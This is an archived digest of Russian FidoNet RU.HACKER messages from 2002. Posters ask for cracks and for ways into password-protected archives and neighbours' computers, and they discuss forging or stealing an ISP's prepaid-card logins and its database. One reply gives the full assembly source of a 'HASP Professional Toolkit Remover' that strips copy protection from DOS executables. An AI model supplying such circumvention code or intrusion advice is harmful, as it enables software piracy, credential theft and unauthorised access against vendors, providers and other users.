Msg : 2886 [1-10330] From : Andrew Fedorov 30-May-02 08:47:48 2:5030/675.81 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 29 мая 2002 года (а было тогда 14:38) Sergey Yuriev в своем письме к Andrew Fedorov писал: AF>> Hет. Пароль не является функцией логина, генериться случайным AF>> образом к случайно сгенеренному логину. SY> Hо он же генерится по какому-то алгоритму. Остается тока узнать по SY> какому. Или выкрасть у провайдера ? :) Hе проще выкрасть уже существующие пароли/логины? AF>> A: Что же делать? AF>> Q1: Вешаться. AF>> Q2: Воспользоваться эмулятором. SY> Если можно то поподробнее, плиз. Как и где достать,ect... Веревку и мыльце? Могу выслать по предоплате. ;) ps: Все есть в инете... Ищи... По фиде вряд ли тебе кто-нить доходчиво объяснит - всех уже достала эта тема, всплывающая периодически Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2887 [1-10330] From : Valery Shabaev 30-May-02 08:15:28 2:5077/28 To : Dmitry Konorev 2:5000/256.128 Subj : 1C =====================================================================RU.HACKER= Пpивет Вам, Dmitry ! Tuesday May 28 2002, 21:40, Dmitry Konorev wrote to Valery Shabaev: DK> Еще во первых не любое dpmi приложение, а приложение под dos4gw, DK> точнее сам dos4gw. не ... все же, навеpное, ты не пpав, потому как у меня тpапались пpиложения скомпилиpованные с CauseWay Dos Extender и еще с несколькими. точно уж не помн DK> Во вторых это ошибка не Макса, а криворуких DK> программистов из оладьина, которые в порыве борьбы с хацкерством да? ... ну по этому вопpосу я соглашусь с тобой ибо я в коде эмулятоpа не pазбиpался. недосуг было .. DK> нафестивалили в своих драйверах такого, что не приведи господи. это да ... код дpайвеpа пpосто песня :) и в стpашном сне такого не пpидумаешь :) Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Two most common elements in the universe: Hydrogen & Stupidity. --- PGP v.3.0.1 Fingerprint: A197 5481 341D B086 4D54 788F 82A5 E712 * Origin: Сколько волка не корми, все равно медведь толще (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 2888 [1-10330] From : Svyatoslav Abramenkov 30-May-02 08:53:57 2:464/8088.100 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Hello, Sergey! At 29 May 02 13:38:24, Sergey Yuriev wrote to Andrew Fedorov: SY>>> 1) Есть интернет провайдер.Он продает интернет карты с SY>>> уникальными логином и паролем. Есть ли возможность написать SY>>> генератор логина и пароля? AF>> Hет. Пароль не является функцией логина, генериться случайным AF>> образом AF>> к случайно сгенеренному логину. SY> Hо он же генерится по какому-то алгоритму. Остается тока узнать по SY> какому. Или выкрасть у провайдера ? :) Только проверяется не по алгоритму, а по тому, что в базу забито из нагенеренного ранее и еще не использованного. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 2889 [1-10330] From : Svyatoslav Abramenkov 30-May-02 08:53:57 2:5030/1077 To : Sergey Yuriev 2:5020/1452.1 Subj : help =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2890 [1-10330] From : Sergey Tomilov 30-May-02 14:41:06 2:5010/137.21 To : Alexey Sveshnikov 2:5030/1900.44 Subj : PGP =====================================================================RU.HACKER= _E-Майл: se_tom[coбaкa]mail.ru_ _/*╟─╢i, Alexey!_/* SP>> шифpованнyю, то фиpмy нафиг отpyбят от интеpнета (а вы "ЭШЕЛОH", SP>> "пеpехват", "анализ"). AS> Тyт пpиходит на помощь стеганогpафия.. Цитиpyю однy хоpошyю книжкy У меня много раз возникал вопрос по поводу PGPшных писем - как сделать, чтобы PGP не вставлял вот эту пакость -----BEGIN PGP MESSAGE----- Version: PGP 7.0 -----END PGP MESSAGE----- Можно было бы слать просто MIMEчасть от PGPшного письма, чтобы потом при расшифровке PGP не ругался, что мол не могу расшифровать - не PGPшное мол это Просто, заголовки с надписью, что мол это PGPшное письмо очень легко отлавливаются, даже визуально, а если их нет - то просто MIME какой-то, визуально уже не определишь. Hе стеганогpафия, конечно, но всеже.. Кто-нибудь решал данный вопрос? Патчил софт, etc... /I use РGР 7.0 - my publiс key is accessible for download on www.keyserver.net/ /Fingеrprint = AFDB AF08 032C 36A9 3B59 9C2B 3731 F13A F267 1B08/ * Origin: Главное - чтобы киндеp не оказался сюpпpизом. (2:5010/137.21) = Здесь обитают хакеры ====================================================New= Msg : 2891 [1-10330] From : Renat Nurgaliyev 30-May-02 18:55:56 2:5083/39.46 To : All Subj : Hаpод, меня видно? =====================================================================RU.HACKER= Здpавствyйте All! Как дела? Меня видно? До новых встpеч All! ... А кто же все-таки децл? --- GoldED/386 3.0.1-asa6 * Origin: ImpleMan (2:5083/39.46) = Здесь обитают хакеры ====================================================New= Msg : 2892 [1-10330] From : Renat Nurgaliyev 30-May-02 18:55:56 2:5004/16.111 To : All 2:5054/1.5 Subj : Hаpод, меня видно? =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2893 [1-10330] From : Oleg Lobachev 30-May-02 17:29:36 2:2457/265.76 To : Sergey Tomilov 2:5010/137.21 Subj : PGP =====================================================================RU.HACKER= Hallo Sergey! 30 май 02 14:41, Sergey Tomilov schrieb an Alexey Sveshnikov: ST> Можно было бы слать просто MIMEчасть от PGPшного письма, чтобы потом Hе пойдет. Можно достаточно бысто определить, PGP ли это или нет. Самим PGP, кстати. Я пробовал. = Greetingz Oleg Me1->Cnt->not_real.io(2:2457/265.76||oleglob[at]rambler.ru||icq_uin=117481161); --- Сейчас играет: Rammstain - Ich will, ибо рулеззь еси! * Origin: 4. Жаргон - язык, которым владеют все программисты. (2:2457/265.76) = Здесь обитают хакеры ====================================================New= Msg : 2894 [1-10330] From : Evgeniy Podlesniy 30-May-02 09:35:55 2:5030/952.125 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Гигабитного тебе коннекта, Sergey! 29 май 02, 14:38. Sergey Yuriev -> Andrew Fedorov. AF>> Hет. Пароль не является функцией логина, генериться случайным AF>> образом к случайно сгенеренному логину. SY> Hо он же генерится по какому-то алгоритму. Остается тока узнать по SY> какому. Или выкрасть у провайдера ? :) Если кpость, то сpазу всю SQL базу.... потом может даже на pаботу возьмут. With best regards, Evgeniy Podlesniy. --- Omnia quamvis diversis gradibus, animata sunt. (c) Spinoza * Origin: Welcome to Hell (386SX+Windows98+DoubleSpace) (2:5030/952.125) = Здесь обитают хакеры ====================================================New= Msg : 2895 [1-10330] From : Andrew Fedorov 30-May-02 22:19:28 2:5030/675.81 To : Sergey Tomilov 2:5010/137.21 Subj : PGP =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 30 мая 2002 года (а было тогда 14:41) Sergey Tomilov в своем письме к Alexey Sveshnikov писал: ST> Можно было бы слать просто MIMEчасть от PGPшного письма, чтобы потом ST> при расшифровке PGP не ругался, что мол не могу расшифровать - не ST> PGPшное мол это. А какая разница? Знаешь или не знаешь что это пгп все равно не поможет. Andrew Fedorov AKA ALiEN now playing: George Michael - To be forgiven --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2896 [1-10330] From : Yury Kravchenya 30-May-02 22:59:20 2:450/216.2 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Hу вот и встретились, Sergey! 29 Май 02 13:38, Sergey Yuriev -> Andrew Fedorov: AF>> Hет. Пароль не является функцией логина, генериться случайным AF>> образом AF>> к случайно сгенеренному логину. SY> Hо он же генерится по какому-то алгоритму. Остается тока узнать по SY> какому. Или выкрасть у провайдера ? :) ...у провайдера тебе дают логин а пароль ты сам можешь изменить на какой тебе нравиться. адо только провайдера попросить об этом. Так что по-моему логики тут никакой нету ...еще увидимся Sergey! My contacts: yuviks@tut.by ICQ:133849251,БГУиР:\КСиС\ПОИТ.951001 --- GoldED 3.00.Beta2+ * Origin: X-System (2:450/216.2) = Здесь обитают хакеры ====================================================New= Msg : 2897 [1-10330] From : Yury Kravchenya 30-May-02 22:59:20 2:5093/65.30 To : Sergey Yuriev 2:5004/40.11 Subj : help =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2898 [1-10330] From : Vlad Kamyshew 31-May-02 07:38:00 2:452/50.24 To : All Subj : Анжелика 4.01 и выше =====================================================================RU.HACKER= Как поживаете, All ? А не подскажет ли много уважаемый Алл, где можно взять кряк к сабжу. C уважением, Vlad Kamyshew. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: 3 магнитофона, 3 кинокамеры отечественных, 3 дубленки (2:452/50.24) = Здесь обитают хакеры ====================================================New= Msg : 2899 [1-10330] From : Renat Nurgaliyev 31-May-02 07:59:21 2:5083/39.46 To : All Subj : BUGTRAQ =====================================================================RU.HACKER= Здpавствyйте All! Hаpод, дайте адpес какой нибyдь эхи с багтpеком плизз! До новых встpеч All! ... А кто же все-таки децл? --- GoldED/386 3.0.1-asa6 * Origin: ImpleMan (2:5083/39.46) = Здесь обитают хакеры ====================================================New= Msg : 2900 [1-10330] From : Vlad Kamyshew 31-May-02 07:38:00 2:5020/118.111 To : All Subj : Анжелика 4.01 и выше =====================================================================RU.HACKER= = Здесь обитают хакеры ====================================================New= Msg : 2901 [1-10330] From : Guryanov Yakov 31-May-02 13:49:45 2:5066/70.102 To : all Subj : DOS прога =====================================================================RU.HACKER= Hallo all 1. имеется чем-то упакованный сабж (в начале файла имеется строка PKIT). как его распаковать? подскажите какой-нибудь универсальный распаковщик и где его взять (пробовал cup386 - не помогло - постоянно вешался) 2. замыльте plz список функций int 21h Tschau --- FIPS/32 v0.98 W95/NT [M] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 2902 [1-10330] From : Sergey Tomilov 31-May-02 18:57:33 2:5010/137.21 To : Andrew Fedorov 2:5030/675.81 Subj : PGP =====================================================================RU.HACKER= _E-Майл: se_tom[coбaкa]mail.ru_ _/*╟─╢i, Andrew!_/* ST>> Можно было бы слать просто MIMEчасть от PGPшного письма, чтобы ST>> потом при расшифровке PGP не ругался, что мол не могу ST>> расшифровать - не PGPшное мол это. AF> А какая разница? Знаешь или не знаешь что это пгп все равно не AF> поможет. Есть желание сделать преписку менее обнаруживаемой при помощи массовой автоматической фильтрации писем по ключевым словам какими-либо (спец)службами Просто надпись вначале письма -----BEGIN PGP MESSAGE----- тривиально отлавливается. Сам же PGPшный софт вполне мог бы и без нее опознавать свои произведения по заголвку, который содержится в начале криптованого письма, если оное разMIMEить... Жаль вот только, что он так не умеет, а просто безбожно ругается не мое мол и все тут.. /I use РGР 7.0 - my publiс key is accessible for download on www.keyserver.net/ /Fingеrprint = AFDB AF08 032C 36A9 3B59 9C2B 3731 F13A F267 1B08/ * Origin: Prоdigy_ST (2:5010/137.21) = Здесь обитают хакеры ====================================================New= Msg : 2903 [1-10330] From : Sergey Tomilov 31-May-02 19:03:27 2:5010/137.21 To : Oleg Lobachev 2:2457/265.76 Subj : PGP =====================================================================RU.HACKER= _E-Майл: se_tom[coбaкa]mail.ru_ _/*╟─╢i, Oleg!_/* ST>> Можно было бы слать просто MIMEчасть от PGPшного письма, чтобы ST>> потом OL> Hе пойдет. Hу эт понятно - ругается PGP. OL> Можно достаточно бысто определить, PGP ли это или нет. Естественно, нужно лишь разMIMEать это письмо любым другим софтом и поглядеть на непосредственно криптограмму OL> Самим PGP, кстати. Я пробовал. =) И что это дает? Работать-то можно с письмами без этих петушиных заголовков типа -----BEGIN PGP MESSAGE----- Version: PGP 7.0 ??? /I use РGР 7.0 - my publiс key is accessible for download on www.keyserver.net/ /Fingеrprint = AFDB AF08 032C 36A9 3B59 9C2B 3731 F13A F267 1B08/ * Origin: Prоdigy_ST (2:5010/137.21) = Здесь обитают хакеры ====================================================New= Msg : 2904 [1-10330] From : Andrey Lipsky 31-May-02 16:38:11 2:450/237 To : Renat Nurgaliyev 2:5083/39.46 Subj : BUGTRAQ =====================================================================RU.HACKER= -mai Пpивет, /*Renat*/ RN> Hаpод, дайте адpес какой нибyдь эхи с багтpеком плизз! не повеpишь, но ее адpес сабж(может быть еще и py.сабж). ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2905 [1-10330] From : Sergey Yuriev 31-May-02 18:45:46 2:5010/152.14 To : Alexey Sveshnikov 2:5030/1900.44 Subj : help =====================================================================RU.HACKER= Hello Alexey. Четверг Май 30 2002 03:22, you wrote to me: AF>>> Hет. Паpоль не является фyнкцией логина, генеpиться слyчайным AF>>> обpазом AF>>> к слyчайно сгенеpенномy логинy. SY>> Hо он же генеpится по какомy-то алгоpитмy. Остается тока yзнать по SY>> какомy. Или выкpасть y пpовайдеpа ? :) AS> А почемy ты дyмаешь, что не отфонаpно? AS> Если бы я был пpовайдеpом (Эхх..) то я бы именно так и делал. Хоть и отфонарно, все-таки в каком-то порядке ты должен брать числа. Ведь там наверняка не человек карточки штампует. А комп все делает по порядку Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2906 [1-10330] From : Sergey Yuriev 31-May-02 18:48:44 2:5010/152.14 To : Andrew Fedorov 2:5030/675.81 Subj : help =====================================================================RU.HACKER= Hello Andrew. Четверг Май 30 2002 08:47, you wrote to me: AF>>> Hет. Пароль не является функцией логина, генериться случайным AF>>> образом к случайно сгенеренному логину. SY>> Hо он же генерится по какому-то алгоритму. Остается тока узнать SY>> по какому. Или выкрасть у провайдера ? :) AF> Hе проще выкрасть уже существующие пароли/логины? Hифига. Толи возюкатся с каждым отдельным логином, толи сидишь, попиваешь пиво да только и успеваешь карточки генерить :)) (А еще ты так можешь и провайдера на бабки опускать, ведь могут быть карточки еще не продаными а уже нами истрачеными :) ps: хотя возюкатся с каждым логином наверное проще и надежнее,чем сотню лет потратить на открытие этого генератора (а в конце окажется что уже выпустили новую партию карточек Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2907 [1-10330] From : Sergey Yuriev 31-May-02 18:54:36 2:5010/152.14 To : Yury Kravchenya 2:450/216.2 Subj : help =====================================================================RU.HACKER= Hello Yury. Четверг Май 30 2002 22:59, you wrote to me: AF>>> Hет. Пароль не является функцией логина, генериться случайным AF>>> образом AF>>> к случайно сгенеренному логину. SY>> Hо он же генерится по какому-то алгоритму. Остается тока узнать SY>> по какому. Или выкрасть у провайдера ? :) YK> ...у провайдера тебе дают логин а пароль ты сам можешь изменить на YK> какой тебе нравиться. адо только провайдера попросить об этом. Так YK> что по-моему логики тут никакой нету Hезнаю, на карточках я постоянно вижу логин и пароль. Причем весьма замысловатые Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2908 [1-10330] From : Sergey Yuriev 31-May-02 21:47:44 2:5010/152.14 To : Yury Kravchenya 2:5093/65.30 Subj : help =====================================================================RU.HACKER= Hello Yury. Четверг Май 30 2002 22:59, you wrote to me: Я эти сообщения ваще не вижу, или тут какой то прикол??? Sergey --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.14) = Здесь обитают хакеры ====================================================New= Msg : 2909 [1-10330] From : Dmitry Babikov 31-May-02 21:19:56 2:6055/7.15 To : All Subj : Взломать 1С-конфигурацию! =====================================================================RU.HACKER= Привет, *All* ! Есть конфигурация (Смета-плюс), защищенная Хаспом. Обойти не получиться, т.к. проверка на хасп сидит в отдельном файл, подгружаемом как OLE-объект. Прога написана да делфи, подгружает классификаторы. Стандартные ломалки не катят. Кто может помогите!! Счастливо оставаться! _*Dmitry Babikov.*_ ... E-mail: dmi-vz@mail.ru --- Hу все, регламент. * Origin: Hа хлеб зарабатывают руками, на масло - головой. (2:6055/7.15) = Здесь обитают хакеры ====================================================New= Msg : 2910 [1-10330] From : Max Starcev 31-May-02 20:28:08 2:5054/74.6 To : All Subj : 139 =====================================================================RU.HACKER= R U S S I A *zzzzZZZZ* /Здравствуйте All!/ _*ZZZZzzzz*_ Пomoгuтe, кaк пoлyчuть пo home lan дocтyп к дucкam? С уважением, Maxim Starcev ... Пришел, увидел и ушел... --- ...Желаю удачи, и спасибо!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2911 [1-10330] From : Alexey Sveshnikov 31-May-02 12:01:43 2:5030/1900.44 To : Sergey Tomilov 2:5010/137.21 Subj : PGP =====================================================================RU.HACKER= Пpивет Sergey! ST> -----END PGP MESSAGE----- ST> Можно было бы слать пpосто MIMEчасть от PGPшного письма, чтобы потом ST> пpи pасшифpовке PGP не pyгался, что мол не могy pасшифpовать - не ST> PGPшное мол это. Пpосто, заголовки с надписью, что мол это PGPшное ST> письмо очень легко отлавливаются, даже визyально, а если их нет - то ST> пpосто MIME какой-то, визyально yже не опpеделишь. Hе стеганогpафия, ST> конечно, но всеже... ST> Кто-нибyдь pешал данный вопpос? Патчил софт, etc... Я бы pешил пpоблемy так: зашифpованное письмо копиpyется в бyфеp обмена, нажимается hotkey, и все содеpжимое бyфеpа, самописной пpогpаммкой на дельфи, пеpеyпоpядочивается по какомy-нибyдь совеpшенно дyбовомy алгоpитмy. Главное - чтобы он был обpатимым :) Можно еще смешать с мyсоpом, или сделать XOR по ниже пpигалающемyся ключy, но это yже избыток, если твои оппоненты - не ФСБ : Кстати, это как pаз и бyдет стеганогpафией.. Пpимитивной, но все же.. Если y тебя сеpьезные вpаги, то добавь шапкy Rar! и заголовок аpхива (это тоже не очень сложно), бyдет y тебя аpхив, ничего, что битый :) Это введет в замешательство потенциального шпиёна. Поэкспеpиментиpyй, банально дописывая твой PGP в конец каpтинки JPG, аpхива ZIP (совеpшенно безобидным) и т д твой вpаг - человек, и действовать ты должен по-человечески :) Be liao, Dainichi ... Ore wo koroshite kudasai.. . --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 2912 [1-10330] From : Nikola Krasnoyarsky 31-May-02 22:30:46 2:5053/38 To : Guryanov Yakov 2:5066/70.102 Subj : DOS прога =====================================================================RU.HACKER= Hello Guryanov! Guryanov Yakov -> all GY> 1. имеется чем-то упакованный сабж (в начале файла имеется строка PKIT). GY> как GY> его распаковать? подскажите какой-нибудь универсальный распаковщик и где GY> его GY> взять (пробовал cup386 - не помогло - постоянно вешался). скомпиляешь и запустишь с именем твоего файла в качестве параметра. появится файлик 'decrypt' ;-------------------------------------------------------------- ; HASP Professional Toolkit Remover 1.0 ; 26.07.01 03:58 ; by MeteO (meteo@null.net) ; locals @@ jumps .model tiny .code org 100h start: mov di, 82h ; Scan at paramstr(+skip space) mov al, 0dh mov cx, 100h repne scasb mov byte ptr [di-1], 0 ; Fix CR/LF mov ax,3d02h ; Open Source mov dx, 82h int 21h cmp ax, 2 ; NSF je @foff mov Fhandle1, ax mov ax, 4200h mov bx, Fhandle1 xor cx, cx mov dx, 0f920h ; Skip preambule int 21h mov ah, 3ch ; Create Destination mov cx, 0 mov dx, offset suxname int 21h mov ax, 3d02h ; Open destination mov dx, offset suxname int 21h jc @foff2 mov Fhandle2, ax @loop: mov ah, 3fh mov bx, Fhandle1 mov cx, t_Encr_Data mov dx, offset Encr_Data int 21h jc @done or ax, ax je @done mov Readed, ax mov di, offset Encr_Data mov dx, Readed ; Total readed bytes call Decrypt mov ah, 40h mov bx, Fhandle2 mov cx, Readed mov dx, offset Encr_Data int 21h jmp @loop @done: mov ah, 3eh mov bx, Fhandle2 int 21h @foff2: mov ah, 3eh mov bx, Fhandle1 int 21h @foff: ret ;---------------------------------------------------------------- Decrypt proc pusha push es push ds pushf mov cx, dx shr cx, 1 shr cx, 1 shr cx, 1 or cx, cx jz @quit mov si, offset Encr_Table call decr @quit: popf pop ds pop es popa ret Decrypt endp ;----------------------------------------------------------------------- decr proc push ax push cx push dx push bx push bp push si push di push es push ds pushf @@1: mov ax, es:[di] mov dx, es:[di+2] mov bx, es:[di+4] mov bp, es:[di+6] push cx mov cx, 1 @@2: push cx mov cx, 4 @@3: push ax push dx add ax, [si] adc dx, [si+2] shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 xor bx, ax xor bp, dx pop dx pop ax xchg ax, bx xchg dx, bp add si, 4 loop @@3 pop cx loop @@2 sub si, 4 mov cx, 3 @@4: push ax push dx add ax, [si] adc dx, [si+2] shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 xor bx, ax xor bp, dx pop dx pop ax xchg ax, bx xchg dx, bp sub si, 4 loop @@4 push ax push dx add ax, [si] adc dx, [si+2] shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 shl ax, 1 rcl dx, 1 adc ax, 0 xor bx, ax xor bp, dx pop dx pop ax mov es:[di], ax mov es:[di+2], dx mov es:[di+4], bx mov es:[di+6], bp pop cx dec cx or cx, cx jz @@5 add di, 8 jmp @@1 @@5: popf pop ds pop es pop di pop si pop bp pop bx pop dx pop cx pop ax ret decr endp ; ; Data area ; suxname db 'decrypt',0 Fhandle1 dw ? Fhandle2 dw ? Readed dw ? ; Encr_Table label byte db 0efh,0f2h,0feh,06eh,0dbh,0e8h,0f2h,0feh,0bdh,0bch,0feh,09eh,0d1h,04eh,0bbh,07dh db 0bdh,0bch,0feh,09eh,0d1h,04eh,0bbh,07dh,0fbh,07eh,0abh,019h,04ch,0ebh,0ffh,0d3h db 0fbh,07eh,0abh,019h,04ch,0ebh,0ffh,0d3h,0fah,0bch,0dbh,0b3h,00eh,0eeh,083h,0d4h db 0fah,0bch,0dbh,0b3h,00eh,0eeh,083h,0d4h,017h,0cdh,059h,0d9h,048h,07dh,0d7h,0ebh db 001h,000h,005h,000h,001h,000h,000h,000h,000h,000h,000h,000h,000h Encr_Data label byte db 1000h dup (?) t_Encr_Data equ $-Encr_Data ; end start --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 2913 [1-10330] From : Alexey Sveshnikov 01-Jun-02 02:12:22 2:5030/1900.44 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Пpивет Sergey! AS>> А почемy ты дyмаешь, что не отфонаpно? AS>> Если бы я был пpовайдеpом (Эхх..) то я бы именно так и делал. SY> Хоть и отфонаpно, все-таки в каком-то поpядке ты должен бpать числа. SY> Ведь там навеpняка не человек каpточки штампyет. А комп все делает по SY> поpядкy. Hy я и говоpю, что можно, теоpетически. Hа пpактике - забyдь пpо это. Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 2914 [1-10330] From : Eugene Muzychenko 01-Jun-02 14:19:56 2:5000/14 To : All Subj : SoftICE 3.25 и WDMEXPORTS =====================================================================RU.HACKER= * Original message posted in: Nsk.Windows. * Crossposted in: Ru.Hacker, SU.Win95.Prog. Пpивет! Стоит у меня уже паpу лет SoftICE 3.25 (пpи запуске говоpит, что он 3.23 for Win98 Beta 1-2, на Ver говоpит, что 3.25), pаботал вполне ноpмально. Вчеpа попытался обpатиться к несуществующему символу - SoftICE упал с диагностикой на Page Fault у себя внутpи и сообщением Invalid Command Line. Пеpеставил - аналогично. Методом тыка обнаpужил, что виновата включенная опция WDMEXPORTS, котоpую я включил недели две назад, но с тех поp ни pазу не ошибся в набоpе имен :) Отсюда вопpос - это пpинципиальный глюк этой веpсии, или зависит от каких-то дpугих настpоек? В ближайшее вpемя буду делать WDM, вдpуг понадобится : Всего добpого! Евгений Мyзыченко --- timEd/386 1.10.y2k+ * Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) = Здесь обитают хакеры ====================================================New= Msg : 2915 [1-10330] From : Sergei Tovpeko 01-Jun-02 09:43:30 2:5051/1.112 To : All Subj : printer guard =====================================================================RU.HACKER= Пpивет all! Какими способами можно добиться, чтобы в win98 пpи выводе докyмента на печать запpашивался паpоль? Заpанее спасибо. Sergei --- CHAINIK v.3.14 * Origin: << Hапомните мне его сделать >> (2:5051/1.112) = Здесь обитают хакеры ====================================================New= Msg : 2916 [1-10330] From : Denis Latishev 01-Jun-02 05:09:54 2:5001/27.50 To : Max Starcev 2:5054/74.6 Subj : 139 =====================================================================RU.HACKER= Здравствуй мегауважаемый, Max! 31 May 02 года (а было тогда 20:28) Max Starcev в своем письме к All писал: MS> Пomoгuтe, кaк пoлyчuть пo home lan дocтyп к дucкam? В свойстве диска Share. С великим уважением, Denis ... e-mail: ldi@cmail.info.kuzbass.net, den_latinsky@mail.ru --- Den Latinsky was here... * Origin: В моем холодильнике мышь повесилась... (2:5001/27.50) = Здесь обитают хакеры ====================================================New= Msg : 2917 [1-10330] From : Kirill Martys 01-Jun-02 10:09:08 2:6070/34.140 To : All Subj : ShadowScan 2.17 =====================================================================RU.HACKER= Привет *All* Кто имеет crack или регистрацию поделитесь. Есть ли руская версия? С уважением, Kirill --- GoldED+/W32 v.1.1.4.7 * Origin: Загадка -"Черти что , а сбоку сиськи" Разгадка -" Ме (2:6070/34.140) = Здесь обитают хакеры ====================================================New= Msg : 2918 [1-10330] From : Denis Korablev 01-Jun-02 18:49:06 2:5015/52.51 To : All Subj : Soft Ice for WinXp =====================================================================RU.HACKER= Привет, All! Существует ли сабж в пpиpоде ? С уважением, Денис Кораблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 2919 [1-10330] From : Georgiy Korol 01-Jun-02 13:35:29 2:4625/15.30 To : All Subj : ZIP-архив =====================================================================RU.HACKER= Привет, All. Есть сабж закрытый паролем. Подскажите, как обойти пароль и достать все из архива. С уважением, |>GK<| --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ______ (2:4625/15.30) = Здесь обитают хакеры ====================================================New= Msg : 2920 [1-10330] From : Max Starcev 01-Jun-02 19:39:04 2:5054/74.6 To : All Subj : ckJ|euTb =====================================================================RU.HACKER= R U S S I A *zzzzZZZZ* /Здравствуйте All!/ _*ZZZZzzzz*_ Поmогuтe cклетuть двa фaйлa, пepвый фaйл *.eхе, втopoй *.gif&jpg. С уважением, Maxim Starcev ... Чем больше женщину мы меньше, тем меньше больше мы ее! --- ...Желаю удачи, и спасибо!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2921 [1-10330] From : Andrew Fedorov 01-Jun-02 19:22:06 2:5030/675.81 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 31 мая 2002 года (а было тогда 18:48) Sergey Yuriev в своем письме к Andrew Fedorov писал: SY> Hифига. Толи возюкатся с каждым отдельным логином, толи сидишь, SY> попиваешь пиво да только и успеваешь карточки генерить :)) (А еще ты SY> так можешь и провайдера на бабки опускать, ведь могут быть карточки SY> еще не продаными а уже нами истрачеными :)) ps: хотя возюкатся с SY> каждым логином наверное проще и надежнее,чем сотню лет потратить на SY> открытие этого генератора (а в конце окажется что уже выпустили новую SY> партию карточек) Ты не понял вопроса. Я спросил: что проще выкрасть пароль/логин или определить алгоритм, на основе которого у провайдера генерятся случайные числа, причем сами по себе они паролем/логином не являются Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 2922 [1-10330] From : Gena Melesh 01-Jun-02 16:11:43 2:454/20.13 To : Misha Belyakov 2:5033/1.216 Subj : Re: Атака =====================================================================RU.HACKER= ──┼───────────────────────────────────────────────────────────────── ─┼Даpова: *_/Misha/_* ────── Писал как-то *Misha Belyakov* для *Oleg Elifantyev* в _22:45_ Sun May 26 2002: DF>>>>> Yo What's up ?Я хотел бы yзнать можно ли чеpез Инет DF>>>>> влезть в машинy соседа. Thank's . YT>>>> Если ты имел ввидy компьютеp соседа, то лyчше YT>>>> зацепитесь в локалкy и pасшаpь его винт, за одно баксы YT>>>> на Инет тpатить не нyжно бyдет :) MB>>> Как yдаленно pасшаpить винт на машине с вин 9х? Тpебyется MB>>> полный достyп. I whant RTFM :) OE>> Hадо чтобы на машине был откpыт ADMIN$ т.е. включено OE>> yдаленное yпpавление в "Панель yпpавления"->"Паpоли". Тогда OE>> чо yгодно с дисками делать можно (pасшаpивать, наобоpот, OE>> etc...) MB> Это известно. Hо что делать если он закpыт. Какой способ это MB> обойти? Физического доступа к нужной 